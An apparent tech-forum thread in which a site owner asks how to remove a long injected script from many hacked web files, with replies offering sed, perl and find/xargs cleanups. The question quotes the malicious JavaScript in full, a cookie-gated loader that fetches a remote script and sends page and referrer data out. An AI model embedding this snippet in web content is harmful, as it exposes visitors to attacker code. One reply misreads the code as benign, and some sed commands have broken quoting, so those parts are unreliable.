Solved

Remove a very long string from all files in Linux

Posted on 2016-11-10
6
109 Views
Last Modified: 2016-11-11
Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup

I had the following idea.... All the files has the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

when I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and ten somehow tell the system to remove said line from the file

Any idea how I'd go about doing such a thing?
0
Comment
Question by:David Sankovsky
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
6 Comments
 
LVL 62

Expert Comment

by:gheist
ID: 41882333
Restore from backup and never ever let webserver modify content?
0
 
LVL 29

Accepted Solution

by:
serialband earned 500 total points
ID: 41882680
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, you match this will match the string and delete the entire line.  This outputs to stdout:
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
LVL 78

Expert Comment

by:arnold
ID: 41882862
Sed -I is a better approach compared to the /d since the string might not be the dole item on the line.

perl -pi.bak -e '/pattern/replacementofany/g;' files
The -I.bal will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0
Migrating Your Company's PCs

To keep pace with competitors, businesses must keep employees productive, and that means providing them with the latest technology. This document provides the tips and tricks you need to help you migrate an outdated PC fleet to new desktops, laptops, and tablets.

 
LVL 29

Expert Comment

by:serialband
ID: 41883250
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
LVL 78

Expert Comment

by:arnold
ID: 41883286
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -I.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a coldfusion object, might have had the person modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
LVL 7

Author Closing Comment

by:David Sankovsky
ID: 41883740
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched file to whatever cleaning tool I chose (sed, perl, or whatever)

I eventually used "find" to make sure I don't accidently send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
centos linux 65 186
Backup Raspberri Pi over the netowrk to a Windows Share 5 60
Install XRDP on Ubuntu Server 16.10 x64 3 58
Advice on ESXi 5.1 Health / Storage 1 41
Setting up Secure Ubuntu server on VMware 1.      Insert the Ubuntu Server distribution CD or attach the ISO of the CD which is in the “Datastore”. Note that it is important to install the x64 edition on servers, not the X86 editions. 2.      Power on th…
It’s 2016. Password authentication should be dead — or at least close to dying. But, unfortunately, it has not traversed Quagga stage yet. Using password authentication is like laundering hotel guest linens with a washboard — it’s Passé.
This demo shows you how to set up the containerized NetScaler CPX with NetScaler Management and Analytics System in a non-routable Mesos/Marathon environment for use with Micro-Services applications.
How to Install VMware Tools in Red Hat Enterprise Linux 6.4 (RHEL 6.4) Step-by-Step Tutorial

740 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question